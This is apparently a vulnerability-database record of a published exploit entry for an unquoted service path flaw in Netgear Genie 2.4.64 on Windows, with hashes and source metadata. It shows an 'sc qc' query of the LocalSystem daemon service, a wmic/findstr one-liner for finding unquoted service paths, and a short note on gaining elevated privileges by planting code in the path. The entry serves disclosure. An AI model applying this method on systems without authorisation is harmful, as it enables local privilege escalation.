ID

VAR-E-202110-0176


TITLE

Netgear Genie 2.4.64 Unquoted Service Path

Trust: 0.5

sources: PACKETSTORM: 164607

DESCRIPTION

Netgear Genie version 2.4.64 suffers from an unquoted service path vulnerability.

Trust: 0.5

sources: PACKETSTORM: 164607

AFFECTED PRODUCTS

vendor:netgearmodel:geniescope:eqversion:2.4.64

Trust: 0.5

sources: PACKETSTORM: 164607

EXPLOIT

# Exploit Title: Netgear Genie 2.4.64 - Unquoted Service Path
# Exploit Author: Mert DA┼×
# Version: 2.4.64
# Date: 23.10.2021
# Vendor Homepage: https://www.netgear.com/
# Tested on: Windows 10

C:\Users\Mert>sc qc NETGEARGenieDaemon
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NETGEARGenieDaemon
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\NETGEAR
Genie\bin\NETGEARGenieDaemon64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGEARGenieDaemon
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Or:
-------------------------
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

#Exploit:

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.

Trust: 0.5

sources: PACKETSTORM: 164607

EXPLOIT HASH

LOCAL

SOURCE

md5: cfe43ceba8f9996b699d361f196538db
sha-1: c065ca15ce84e47e914eda953c07acb8bbcdde0b
sha-256: bab104f6c9713f20e72527147150a4ac666acd64cb8edf7929452579dd7088e9
md5: cfe43ceba8f9996b699d361f196538db

Trust: 0.5

sources: PACKETSTORM: 164607

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 164607

TAGS

tag:exploit

Trust: 0.5

sources: PACKETSTORM: 164607

CREDITS

Mert Das

Trust: 0.5

sources: PACKETSTORM: 164607

EXTERNAL IDS

db:PACKETSTORMid:164607

Trust: 0.5

sources: PACKETSTORM: 164607

SOURCES

db:PACKETSTORMid:164607

LAST UPDATE DATE

2022-07-27T09:29:24.970000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:164607date:2021-10-25T16:19:20